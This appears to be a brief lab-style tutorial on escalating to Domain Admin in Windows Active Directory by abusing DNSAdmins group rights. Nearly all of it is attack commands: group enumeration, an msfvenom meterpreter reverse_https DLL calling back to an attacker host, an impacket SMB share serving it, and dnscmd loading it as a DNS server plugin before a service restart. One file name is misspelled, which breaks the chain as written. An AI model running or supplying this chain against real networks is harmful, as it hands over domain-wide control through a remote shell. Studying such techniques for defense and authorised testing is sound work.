In This section we will Learn how to PrivEsc to Domain Admin using DNS Admins Rights.

Now, Let’s start by enumerating the DNS Admins Group.

Get-NetGroupMember -Identity "DNSAdmins"

Notice that we got two users.

Now, Let’s create a malicious payload using msfvenom.

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.2.130 LPORT=444 -f dll -o administrator.dll

Now, Let’s open smbserver.

impacket-smbserver rem01x `pwd`

Now, Let’s go back to the machine and get the dll file.

dnscmd zerosploit.co /config /serverlevelplugindll \\\\192.168.2.130\\rem01x\\administratro.dll

sc stop dns
sc start dns